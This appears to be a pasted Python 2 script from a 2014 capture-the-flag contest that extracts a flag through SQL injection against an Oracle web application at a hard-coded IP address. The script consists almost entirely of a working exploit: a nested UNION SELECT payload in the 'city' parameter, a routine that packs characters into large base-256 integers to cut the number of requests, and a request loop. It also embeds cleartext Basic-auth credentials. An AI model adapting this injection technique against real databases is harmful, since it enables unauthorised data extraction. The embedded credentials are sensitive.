
Untitled

a guest Jan 27th, 2014 370 Never
#!/usr/bin/python
#
# Though the exploited function has to return ONLY a numeric value,
# we can still reduce the number of SQL requests needed to extract the flag
# thanks to Oracle's ability to operate on quite BIG numbers.
#
# Below is how to obtain the flag with just THREE requests:
# ONE to extract the flag's length and TWO to extract the flag itself.
#
  10.  
  11. from urllib2 import urlopen, Request
  12. import re
  13. import base64
  14.  
# Characters packed into one SQL expression by numerize(): each character
# becomes one base-256 digit of a single integer returned by the query.
MAX_LEN = 16
# HTTP Basic-auth credentials; they are base64-encoded into the
# Authorization header of every request below.  They sit in cleartext in
# this script, so anyone holding the file holds the account.
username = 'admin'
password = 'P@ssw0rd9823_#@!hhqqyi'
  18.  
def numerize(name, length):
    """Split a ``length``-character value into Oracle SQL expressions.

    Each returned string packs a run of at most ``MAX_LEN`` consecutive
    characters of ``name`` (a column or expression) into one integer in
    big-endian base 256: ``ascii(substr(name,k,1))*power(256,e)`` terms
    joined by ``%2b`` (the URL-encoded ``+``).  Characters 1..MAX_LEN go in
    the first string, MAX_LEN+1..2*MAX_LEN in the second, and so on; the
    last string covers whatever remains, with exponents counting down to 0
    so the integer decodes back to the same characters.

    Args:
        name: column or expression whose characters are packed.
        length: total number of characters to cover; 0 yields ``[]``.

    Returns:
        list of SQL expression strings, one per chunk.
    """
    expressions = []
    # Walk the 0-based character offsets in slices of MAX_LEN.
    for start in range(0, length, MAX_LEN):
        chunk = min(MAX_LEN, length - start)
        terms = [
            'ascii(substr(' + name + ',' + str(start + offset + 1) + ',1))'
            + '*power(256,' + str(chunk - offset - 1) + ')'
            for offset in range(chunk)
        ]
        expressions.append('%2b'.join(terms))
    return expressions
  36.  
  37.  
# Target endpoint; the injection rides in the `city` query parameter.
# For a defender the observable artifacts are a `city` value containing
# `union select`, a PL/SQL package function reachable from the injected
# query, and a handful of requests under the same Basic-auth identity.
url = 'http://195.133.87.173/address_shops.php?city='
# Injected value: closes the quoted string, UNIONs a SELECT that calls a
# package function, and nests a second injection inside that function's
# string argument.  `$PAYLOAD$` is replaced below with a numeric SQL
# expression (length(...) first, then the numerize() chunks).  Spaces are
# written as `+`; the string is concatenated onto `url` without any
# urllib quoting.
v = "flag''+union+select+to_char(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(''''''union+select+$PAYLOAD$+from+secret_products+where+hidden_code+is+not+null--''))+from+dual--"
# HTTP Basic-auth value: base64("username:password"), sent on every request.
creds = base64.b64encode('%s:%s' % (username, password))
# The numeric query result is expected back inside a <tr> element.
pat = re.compile('<tr>(\d+)</tr>')
column_name = 'hidden_code'

# Request one: the character count of the column value.
payload = 'length(%s)' % column_name

print 'Extracting flag length: ',
request = Request(url + v.replace('$PAYLOAD$',payload))
request.add_header("Authorization", "Basic %s" % creds)
resp = urlopen(request).read()

# re.search returns None when the page carries no <tr>digits</tr>; the
# .groups() call then fails with AttributeError rather than a clear message.
l = int(re.search(pat, resp).groups()[0])
print l

# One SQL expression per MAX_LEN-character chunk, so one request each.
payloads = numerize(column_name, l)

print 'Extracting flag: ',
flag = ''
for payload in payloads:
        request = Request(url + v.replace('$PAYLOAD$',payload))
        request.add_header("Authorization", "Basic %s" % creds)
        resp = urlopen(request).read()
        # Integer -> hex digits; hex() of a Python 2 long carries an 'L' suffix.
        f = str(hex(int(re.search(pat, resp).groups()[0])))[2:]
        if f.endswith('L'): f = f[:-1]
        # Python 2 str.decode('hex') turns each digit pair back into one
        # character.  It raises on an odd digit count, i.e. when the chunk's
        # leading character has a code below 0x10 — presumably never here.
        flag +=  f.decode('hex')
print flag